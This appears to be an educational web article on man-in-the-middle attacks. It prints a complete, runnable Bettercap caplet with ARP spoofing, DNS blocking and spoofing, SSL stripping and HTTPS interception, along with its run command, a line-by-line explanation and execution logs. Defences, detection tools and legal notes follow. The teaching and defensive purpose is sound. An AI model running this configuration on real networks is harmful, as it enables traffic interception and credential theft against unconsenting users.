🔒 Man-in-the-Middle Attacks

Technical Analysis, Attack Vectors & Defense Strategies

⚠️ LEGAL NOTICE: This content is for educational purposes only. Unauthorized network attacks are illegal and punishable by law.

Introduction

A Man-in-the-Middle (MITM) attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are directly communicating with each other. This comprehensive guide examines the technical mechanisms, real-world examples, and defense strategies against MITM attacks.

Key Concept: In a MITM attack, the attacker positions themselves between the victim and their intended destination (such as a website or another network device), allowing them to eavesdrop, manipulate, or block communications without either party's knowledge.

Complete MITM Attack Configuration

The following is a complete Bettercap caplet script that demonstrates a sophisticated MITM attack combining multiple techniques including ARP spoofing, DNS hijacking, SSL stripping, and traffic interception.

📄 /root/spoof.cap - Complete Bettercap Caplet
# ======================================== # NETWORK RECONNAISSANCE # ======================================== net.probe on # ======================================== # ARP SPOOFING CONFIGURATION # ======================================== set arp.spoof.fullduplex true set arp.spoof.targets 192.168.62.233,192.168.62.87 arp.spoof on # ======================================== # SSL STRIPPING SETUP # ======================================== set http.proxy.sslstrip true # ======================================== # DNS BLOCKING VIA IPTABLES # Block target 192.168.62.233 from external DNS # ======================================== !iptables -A FORWARD -s 192.168.62.233 -p udp --dport 53 -j DROP !iptables -A FORWARD -s 192.168.62.233 -p tcp --dport 53 -j DROP # Block target 192.168.62.87 from external DNS !iptables -A FORWARD -s 192.168.62.87 -p udp --dport 53 -j DROP !iptables -A FORWARD -s 192.168.62.87 -p tcp --dport 53 -j DROP # ======================================== # DNS SPOOFING CONFIGURATION # ======================================== set dns.spoof.all false set dns.spoof.address 192.168.62.156 set dns.spoof.domains zsecurity.com,*.zsecurity.com dns.spoof on # ======================================== # NETWORK SNIFFING # ======================================== net.sniff on set net.sniff.filter host 192.168.62.233 and (tcp port 80 or tcp port 443) # ======================================== # HTTP PROXY WITH SSL STRIPPING # ======================================== set http.proxy.sslstrip true http.proxy on # ======================================== # HTTPS INTERCEPTION WITH CUSTOM CERTIFICATES # ======================================== set https.proxy.certificate ~/.bettercap-ssl/bettercap.pem set https.proxy.key ~/.bettercap-ssl/bettercap.key https.proxy on
Execution Command: This caplet is executed using: sudo bettercap -iface wlan0 -caplet /root/spoof.cap

Attack Architecture

Network Topology During MITM Attack

Normal Communication

💻
Victim 1
192.168.62.233
🌐
Gateway/Router
192.168.62.1
☁️
Internet

MITM Attack Scenario

💻
Victim 1
192.168.62.233
⚠️
🎭
Attacker
192.168.62.156
⚠️
🌐
Gateway
💻
Victim 2
192.168.62.87
⚠️
Also compromised

Line-by-Line Attack Analysis

1. Network Reconnaissance

Network Discovery Phase
net.probe on
Purpose: Initiates network probing to discover all active hosts on the 192.168.62.0/24 subnet. This identifies potential targets and maps the network topology before launching the attack.

2. ARP Spoofing Configuration

Address Resolution Protocol Poisoning
set arp.spoof.fullduplex true set arp.spoof.targets 192.168.62.233,192.168.62.87 arp.spoof on
Line 1: Enables full-duplex ARP spoofing, poisoning both the victims' and gateway's ARP cache simultaneously.
Line 2: Specifies two target IP addresses to intercept traffic from.
Line 3: Activates the ARP spoofing attack.
1
To Victim: "I am the gateway (192.168.62.1), my MAC address is [attacker's MAC]"
2
To Gateway: "I am 192.168.62.233, my MAC address is [attacker's MAC]"
3
Result: All traffic between victim and gateway flows through attacker's machine

3. DNS Traffic Blocking

Firewall Rules for DNS Interception
# Block UDP DNS for victim 192.168.62.233 !iptables -A FORWARD -s 192.168.62.233 -p udp --dport 53 -j DROP # Block TCP DNS for victim 192.168.62.233 !iptables -A FORWARD -s 192.168.62.233 -p tcp --dport 53 -j DROP # Block UDP DNS for victim 192.168.62.87 !iptables -A FORWARD -s 192.168.62.87 -p udp --dport 53 -j DROP # Block TCP DNS for victim 192.168.62.87 !iptables -A FORWARD -s 192.168.62.87 -p tcp --dport 53 -j DROP
Purpose: Blocks all DNS requests (port 53) from both targets to external DNS servers. This forces victims to accept DNS responses only from the attacker's DNS spoofer.
Note: The "!" prefix executes shell commands directly from Bettercap.

4. DNS Spoofing Setup

Malicious DNS Resolution
set dns.spoof.all false set dns.spoof.address 192.168.62.156 set dns.spoof.domains zsecurity.com,*.zsecurity.com dns.spoof on
Line 1: Only spoof specific domains (not all DNS queries).
Line 2: Redirect spoofed domains to attacker's IP address (192.168.62.156).
Line 3: Target zsecurity.com and all its subdomains (*.zsecurity.com).
Line 4: Enable DNS spoofing module.
DNS Spoofing Attack Flow
1
Victim's browser requests: "What is the IP of zsecurity.com?"
2
Request is intercepted by attacker (due to ARP spoofing)
3
External DNS servers are blocked by iptables rules
4
Attacker's DNS spoofer responds: "zsecurity.com = 192.168.62.156"
5
Victim connects to attacker's malicious server instead of real website
6
Attacker can serve phishing pages or steal credentials

5. Network Traffic Sniffing

Packet Capture Configuration
net.sniff on set net.sniff.filter host 192.168.62.233 and (tcp port 80 or tcp port 443)
Line 1: Activates network packet sniffing.
Line 2: BPF (Berkeley Packet Filter) to capture only HTTP (port 80) and HTTPS (port 443) traffic from primary target 192.168.62.233.

6. SSL Stripping Attack

HTTPS Downgrade Attack
set http.proxy.sslstrip true http.proxy on
Mechanism: When a victim requests an HTTP site that redirects to HTTPS, the attacker maintains an HTTPS connection to the real server but serves the victim an HTTP version, exposing all traffic in plaintext.
SSL Stripping Process
Victim
HTTP Connection
⚠️
Attacker
Strips SSL
🔒
Real Server
HTTPS Connection
Victim sees: http://example.com (unencrypted)
Attacker reads: All passwords, cookies, and data in plaintext

7. HTTPS Interception

SSL/TLS Certificate Injection
set https.proxy.certificate ~/.bettercap-ssl/bettercap.pem set https.proxy.key ~/.bettercap-ssl/bettercap.key https.proxy on
Purpose: For sites that enforce HTTPS, the attacker presents a fraudulent SSL certificate. If the victim ignores certificate warnings, the attacker can decrypt HTTPS traffic.
Limitation: Modern browsers display prominent warnings for invalid certificates, making this harder to exploit.

Attack Execution Analysis

Bettercap Execution Output
sudo bettercap -iface wlan0 -caplet /root/spoof.cap bettercap v2.33.0 (built for linux arm64 with go1.22.6) [type 'help' for a list of commands] [14:27:44] [sys.log] [inf] gateway monitor started ... [14:27:44] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe [14:27:44] [sys.log] [inf] net.probe probing 256 addresses on 192.168.62.0/24 [14:27:44] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail. [14:27:44] [sys.log] [inf] arp.spoof arp spoofer started, probing 2 targets. [14:27:44] [endpoint.new] endpoint 192.168.62.233 detected as d8:3a:dd:27:71:62 (Raspberry Pi Trading Ltd). [14:27:44] [endpoint.new] endpoint 192.168.62.59 detected as 3a:e4:32:f5:98:5e. [14:27:44] [endpoint.new] endpoint 192.168.62.3 detected as 9e:df:af:7c:52:09.

Output Interpretation

Log Entry Meaning Impact
gateway monitor started Bettercap is monitoring the network gateway Essential for routing intercepted traffic
net.probe probing 256 addresses Scanning entire /24 subnet for active hosts Discovers all potential targets on network
[war] full duplex spoofing Warning about potential detection Some routers can detect and block this attack
arp spoofer started, probing 2 targets ARP poisoning attack is active Traffic from both targets is being intercepted
endpoint 192.168.62.233 detected (Raspberry Pi) Primary target identified Confirms successful target discovery

What Can Be Captured

🔓 Unencrypted Data

HTTP passwords, form data, cookies, session tokens, API keys, email content

🍪 Session Hijacking

Authentication cookies allowing attacker to impersonate victims on websites

💳 Financial Data

Credit card numbers, banking credentials if transmitted over HTTP

📧 Email Credentials

SMTP, POP3, IMAP credentials if not using SSL/TLS

🎯 Browsing Behavior

All websites visited, search queries, online activities

📱 App Traffic

Mobile app communications that don't use certificate pinning

Complete Attack Flow Diagram

Step-by-Step MITM Attack Execution
1
Network Reconnaissance: Execute net.probe on to discover active hosts on 192.168.62.0/24 network
2
ARP Cache Poisoning: Send fake ARP replies to targets (192.168.62.233, 192.168.62.87) and gateway, associating attacker's MAC with their IP addresses
3
Traffic Redirection: All network traffic between victims and gateway now flows through attacker's machine (192.168.62.156)
4
DNS Blocking: iptables rules block victims' DNS requests to external servers (UDP/TCP port 53)
5
DNS Spoofing: Attacker's DNS spoofer responds to queries for zsecurity.com, redirecting to 192.168.62.156
6
SSL Stripping: HTTP proxy downgrades HTTPS connections to HTTP where possible, exposing encrypted traffic
7
HTTPS Interception: For enforced HTTPS sites, present fraudulent certificate to decrypt traffic
8
Packet Capture: Sniff and log all HTTP/HTTPS traffic from target 192.168.62.233
9
Data Extraction: Parse captured packets for credentials, cookies, and sensitive information
10
Packet Forwarding: Forward legitimate traffic to maintain connection and avoid detection

Defense Strategies Against MITM Attacks

Network-Level Defenses

Cisco Switch Configuration - Dynamic ARP Inspection
! Enable Dynamic ARP Inspection on all VLANs Switch(config)# ip arp inspection vlan 1-100 ! Validate source MAC, destination MAC, and IP addresses Switch(config)# ip arp inspection validate src-mac dst-mac ip ! Configure trusted interfaces (uplinks only) Switch(config)# interface GigabitEthernet0/1 Switch(config-if)# ip arp inspection trust ! Enable DHCP Snooping (required for DAI) Switch(config)# ip dhcp snooping Switch(config)# ip dhcp snooping vlan 1-100 ! Configure port security Switch(config-if)# switchport port-security Switch(config-if)# switchport port-security maximum 2 Switch(config-if)# switchport port-security violation restrict Switch(config-if)# switchport port-security mac-address sticky

User-Level Defenses

🔐 Always Use HTTPS

Install browser extensions like HTTPS Everywhere. Never enter credentials on HTTP sites.

🔒 VPN Protection

Use trusted VPN services on public WiFi. Encrypts all traffic end-to-end, preventing interception.

⚠️ Certificate Warnings

NEVER ignore SSL certificate warnings. They indicate potential MITM attacks.

🔑 Multi-Factor Authentication

Enable MFA on all accounts. Protects even if password is intercepted.

📱 Avoid Public WiFi

Use mobile data for sensitive transactions. Public WiFi is inherently insecure.

🛡️ Security Software

Use endpoint protection that detects ARP spoofing and suspicious network activity.

Application-Level Defenses

HTTP Strict Transport Security (HSTS) Implementation
# Add HSTS header in web server configuration # Apache Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" # Nginx add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always; # This forces browsers to only connect via HTTPS # Prevents SSL stripping attacks

Detecting MITM Attacks

Signs of an Active MITM Attack

🚨
SSL Certificate Warnings: Browser shows warnings about invalid or untrusted certificates
🚨
Unexpected HTTPS Downgrade: Sites you normally access via HTTPS appear as HTTP
🚨
Duplicate IP/MAC Warnings: Operating system alerts about duplicate addresses on network
🚨
Unusual Network Latency: Sudden increase in response times or packet loss
🚨
Disconnection Issues: Frequent disconnections or unstable connections
🚨
Suspicious ARP Traffic: Excessive ARP responses detected by network monitoring tools

Detection Tools

Using arpwatch to Detect ARP Spoofing
# Install arpwatch sudo apt-get install arpwatch # Start arpwatch monitoring sudo arpwatch -i eth0 # Check logs for ARP changes sudo tail -f /var/log/syslog | grep arpwatch # Example suspicious output: flip flop 192.168.62.1 aa:bb:cc:dd:ee:ff (old MAC) new MAC: 11:22:33:44:55:66
Manual ARP Table Inspection
# View ARP cache on Linux/Mac arp -a # View ARP cache on Windows arp -a # Look for duplicate MAC addresses or unexpected changes # Gateway MAC should never change # Example normal output: gateway (192.168.62.1) at aa:bb:cc:dd:ee:ff on eth0 # Example attack detected: gateway (192.168.62.1) at 11:22:33:44:55:66 on eth0 [SUSPICIOUS!]

Real-World Attack Scenarios

Scenario 1: Coffee Shop Attack

Attack Vector

Location: Public WiFi at coffee shop
Attacker Setup: Laptop running Bettercap, positioned near victims
Target: All users on the WiFi network
Method: ARP spoofing + SSL stripping + DNS hijacking

Attack Timeline:
  1. Attacker connects to coffee shop WiFi
  2. Executes caplet similar to the one analyzed
  3. Victims' banking site logins captured via SSL stripping
  4. Email credentials intercepted from HTTP connections
  5. Social media session cookies stolen for account takeover

Potential Damage: Identity theft, financial fraud, unauthorized access to multiple accounts

Scenario 2: Corporate Network Infiltration

Advanced Persistent Threat

Location: Internal corporate network
Attacker Setup: Compromised workstation or rogue employee
Target: Executives and IT administrators
Method: Targeted ARP spoofing + HTTPS interception

Attack Objectives:
  • Steal intellectual property and trade secrets
  • Capture VPN credentials for remote access
  • Intercept internal communications and emails
  • Gather information for lateral movement
  • Install additional backdoors and malware

Potential Damage: Data breach, corporate espionage, regulatory violations, millions in damages

Scenario 3: Hotel WiFi Attack

Business Traveler Targeting

Location: Hotel guest WiFi network
Attacker Setup: Raspberry Pi hidden in hotel room or common area
Target: Business travelers accessing corporate resources
Method: Automated MITM with credential harvesting

High-Value Targets:
  • Corporate VPN credentials
  • Cloud service access tokens
  • Email account credentials
  • Remote desktop connections
  • File sharing service logins

Potential Damage: Corporate network breach, data exfiltration, business email compromise

Legal and Ethical Considerations

⚖️ Legal Consequences of Unauthorized MITM Attacks

United States

  • Computer Fraud and Abuse Act (CFAA): Up to 20 years in federal prison
  • Wiretap Act: 5 years imprisonment and $250,000 fine per violation
  • Identity Theft: Additional 2-15 years if credentials are stolen
  • Economic Espionage Act: Up to 10 years for trade secret theft

European Union

  • GDPR Violations: Fines up to €20 million or 4% of global revenue
  • Computer Misuse Act: Up to 10 years imprisonment (UK)
  • Data Protection Laws: Civil and criminal penalties

Additional Consequences

  • Permanent criminal record affecting employment and travel
  • Civil lawsuits from victims for damages
  • Professional license revocation
  • Asset seizure and restitution orders
  • Supervised release and probation restrictions

Authorized Use Cases

MITM techniques may be legally used ONLY in these contexts:

1. Authorized Penetration Testing

  • Written authorization from network owner
  • Clearly defined scope and rules of engagement
  • Professional indemnity insurance
  • Proper documentation and reporting

2. Security Research

  • Isolated lab environment with owned equipment
  • No connection to production networks
  • Responsible disclosure of vulnerabilities
  • Academic or professional research purposes

3. Network Administration

  • Troubleshooting company-owned networks
  • Network monitoring with user consent
  • Security testing of internal systems
  • Legitimate business purposes only

4. Educational Purposes

  • Controlled classroom or lab environments
  • Sandboxed virtual networks
  • No real user data or systems involved
  • Supervised by qualified instructors

Conclusion

Man-in-the-Middle attacks represent one of the most serious and prevalent threats in modern cybersecurity. The analyzed Bettercap caplet demonstrates how multiple attack vectors can be combined to create a sophisticated interception system capable of compromising network security, stealing credentials, and intercepting sensitive communications.

The technical sophistication required to execute these attacks has decreased dramatically with modern tools like Bettercap, making MITM attacks accessible even to individuals with limited technical expertise. This democratization of attack capabilities makes it more critical than ever for organizations and individuals to implement robust defensive measures.

Key Takeaways

1
Layered Defense is Essential: No single security measure is sufficient. Implement multiple layers including encryption, network segmentation, monitoring, and user education.
2
Encryption is Fundamental: Always use HTTPS, VPNs, and encrypted protocols. SSL/TLS provides critical protection against interception.
3
Network Infrastructure Matters: Modern switches with DAI, DHCP snooping, and port security can prevent many ARP-based attacks.
4
User Awareness is Critical: Training users to recognize warning signs and follow security best practices is as important as technical controls.
5
Continuous Monitoring Required: Deploy IDS/IPS systems and regularly audit network traffic for suspicious patterns.
Final Reminder: The knowledge presented in this document is intended exclusively for defensive security purposes, authorized penetration testing, and education. Understanding MITM attacks enables security professionals to better protect networks and users from these threats. Ethical behavior, respect for privacy, and adherence to legal requirements are fundamental responsibilities of everyone in the cybersecurity field.
For Security Professionals: When conducting authorized penetration tests involving MITM techniques, always maintain detailed documentation, obtain explicit written consent, clearly define scope boundaries, and provide comprehensive reports with remediation recommendations. Your professional reputation and legal protection depend on ethical conduct and proper authorization.